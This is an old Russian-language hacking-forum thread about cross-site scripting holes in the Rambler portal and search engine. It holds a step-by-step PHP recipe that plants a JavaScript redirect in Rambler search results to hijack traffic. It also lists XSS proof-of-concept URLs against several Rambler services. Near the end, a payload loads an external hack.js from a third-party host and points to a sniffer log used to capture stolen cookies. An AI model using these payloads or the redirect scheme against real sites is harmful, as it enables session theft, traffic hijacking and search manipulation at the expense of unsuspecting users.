Люди, в рамблере есть дыра, тока чё с ней делать??
суть:
Я на своём сайте делал какую то защиту от неправильных запросов к PHP , и прикола ради
поставил скрипт на открытие cd и кучу алертов за неправильный запрос...
И чё я вижу... проверяю позиции своего сайта, ввожу запрос в рамблер, он выдаёт по поиску сайты и вдруг у меня открывается крышка cd и вылетают бесконечные алерты )))
К привеликому сожалению, этой страницы уже давно нет, и чё я в ней писал не помню (теперь буду вспоминать...)
но в исходнике страницы рамблера явно написан мой скрипт в таком плане:
http://www.site.ru/page.php?id=001&bla-bla&bla-bla<script>....

Чё можно сделать, думайте сами...

Кстати ща мысль родилась:
если сделать на странице так:
<a href="http://site.ru/page.php?<script>......</script>">bla-bla</a> Может он и её проиндексирует и отобразит в поиске как есть... Эх ждать долго ((

ВСПОМНИЛ !!!!!
Я там такую херь писал:

$id=$_GET['id'];

...

$id = ereg_replace("[^0-9_]","<script>....</script>",$id);

....

echo "bla-bla-bla".$id."bla-bla-bla";

чёто в этом духе )))


Какие есть соображения?

Для начала выучи javascript а потом пиши такие посты%)Удачи%)хех, прочти: http://antichat.ru/txt/chatnarod/ . И ты скажеш что чел не знает JavaScript?

хм, молодец.хорошая статейка.

лишний раз доказывает, что в сети полно не защищённых компов. За пост - отдельно респект, если продумать, то можно и не только Cd открывать у пользователей

Интересно вроде вот xss.http://health.rambler.ru/drugs/results.html?words=%3Cscript%3Ealert%20(%27XSS%20b y%20SanyaX%27)%3C/script%3E

Интересно вроде вот xss.http://health.rambler.ru/drugs/results.html?words=%3Cscript%3Ealert%20(%27XSS%20b y%20SanyaX%27)%3C/script%3E
Да, только вот с помощью этой xss пароль от ящика угнать не получится. Ведь mail.rambler.ru и health.rambler.ru разные сервера :(

Сервер вообщето один...
но эт ничё не меняет...

Кароч, я тут пытался разобраться, как он эту херь проиндексировал, и вот на что наткнулся:
Стоит у меня на каждой страничке счётчик рамблера, а он сволочуга регистрирует всех рефереров с которых пришли на данную страницу...
И... открыл я статистику посещений в рамблер топ-100, а там ЭТА ссылка (которой в реальности нет ! Но запрос такой был) http://site.ru/page.php?a=01&b=02&c='XSS<...>

Вместо XSS - символы которые мой ПХП скрипт заменял на мой JAVASCRIPT , короче эта якобы-ссылка попала в базу рамблера , и при запросе в поиске rambler.ru с определённым ключевым словом Выскакивает мой Javascript в рамблере......

Что с этого можно поиметь ??? И как этим воспользоваться для того, чтобы поработить вселенную - теперь будем думать ))))

Остается только найти сайт, создать страницу, поставить на нее ссылку вида <сайт>/<страница>?<код> и ждать...
Хотя я сомневаюсь, что Rambler может позволить себе такие уязвимости. Правда, если позволяет XSS в поисковых запросах - то вполне...

Вот решил вас приколоть.....

Сделал тоже самое ( почти )

Я ж говорю, это легко, все якобы-ссылки он берёт из топ-100 , причём, я так понял, каждый день...

Вчера эмулировал ссылку с неправильным запросом на мой ПХП скрипт, И вот что получилось:

http://www.rambler.ru/srch?old_q=webbaza&words=webbaza+alert&btnG=%CD%E0%E9%F2%E8%21
(17.11.2005) З.Ы. Ссылка уже не работает , т.к. страницы нет, а был алерт в рамблере -)

Это весело ))

Так что, Kanick , не сомневайся!!
Кстати, помоему, это не XSS уязвимость, а чёртиё знает какая....
Остаётся самое главное - будем думать как теперь мы поработим вселенную))

Ни черта себе! :eek:
Нет слов!

Покопаюсь-ка я тоже.

Да забавный факт нашел Dmitro. Поработаем над ним.

Как мне передали, дыра на Рамблере старая и бесперспективная. :(
Рамблер даже куки не оставляет.
Единственный возможный вариант использования - редирект на свой сайт. Что ж, отличный прием для раскрутки. ;)

Что ж, отличный прием для раскрутки
Угук. Раскрутить один раз сайт на слово "работа" (ну или порно) и все. Потом кто вобьет в поиске "работа" - редиректом на сайт Дмитро будет попадать (наращивая раскрутку как снежный ком).

Дмитро - респект. Действительно откопал забавную штуку. =)

Вообщем , чтоб было всем понятнее, делаем так:
1) В index.php пишем повыше на странице :
********************************
<?php
if(isset($_GET['ID'])){$ID = ereg_replace("[^0-9_]","<script language='Javascript'><!--
function reload() {location = \"http://ВАШ_САЙТ.ru\"}; setTimeout('reload()', 10);
//--></script>",$_GET['ID']);}
echo $ID;
echo "<br><b>".$ID."</b><br><a href=\"http://ВАШ_САЙТ/?".$ID."\">". $ID."</a>";
?>
*********************************
// Зачем три раза повторять $ID ? - Чёртиво знает, откуда рамблер его тянет, толи из ссылки, толи из тега... кашу маслом не испортишь, а там можно и поэксперементировать ))
2) Затем делаем URL запрос http://ВАШ_САЙТ.ru/?ID=[Любые буквы или символы]
желательно побольше таких запросов с разными буквами после "?"
После чего счётчик rambler top-100 на этой странице фиксирует эти запросы, ( их можно посмотреть в статистике посещений ) , затем через какое-то время их индексирует поисковик рамблера. И всё !
3) После индексации будет редирект на Ваш сайт прямо из Рамблера.
А можно сделать ещё круче, т.е. сделать действительно снежный ком !!
Создать массив слов и чисел, создать рандом переменную , состоящую из "слово+число" и добавить эту переменную в редирект, т.е.
"http://Ваш_сайт.ru/?".$random
тем самым получим цыкл...
Ну вот вроде разжевали )))

Вон кстати ребятишки чё нашли:



http://ftpsearch.rambler.ru/db/ftpsearch/search.html?
ftype=5&form=%3Cscript%3Ealert(/XSS/)%3C/script%3E&site=
ftp.elektra.ru&dir=%3Cscript%3Ealert(/XSS/)%3C/script%3E
http://finance.rambler.ru/db/chain.html?type=fix&chain_id=
!RUBFIX=%3Cscript%3Ealert(/XSS/)%3C/script%3E&show_ind_lst=
rustypes&show_ind_lst=curs
http://finance.rambler.ru/db/chain.html?show_ind_lst=
fortypes&type=forex&chain_id=!FX=%3Cscript%3Ealert(/XSS/)%3C/script%3E
http://pokupki.rambler.ru/?action=goods&dir=&no_img=&dl=
&s=%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&minp=
%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&maxp=
%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&x=60&y=14&cat=80%2F36%2F3%2F0
http://smi.rambler.ru/main.cgi?action=
%3Cscript%3Ealert('XSS')%3C/script%3E&name=sources/index.html
http://www.rambler.ru/db/sport/news.html?d=
%3Cscript%3Ealert('XSS')%3C/script%3E



Источник: http://antisec.2x4.ru/advisories/rambler.txt

http://health.rambler.ru/drugs/results.html?words=<script>alert%20('XSS%20b%20y%20SNIFF')</script><script%20src=http://www.fath.jino-net.ru/hack.js></script>

Потом на http://antichat.ru/sniff/log.php